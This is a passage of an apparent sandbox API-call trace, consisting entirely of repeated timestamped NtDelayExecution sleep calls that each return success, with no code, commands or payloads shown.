(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.063] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.209] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.218] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.221] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.379] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0149.578] NtDelayExecution 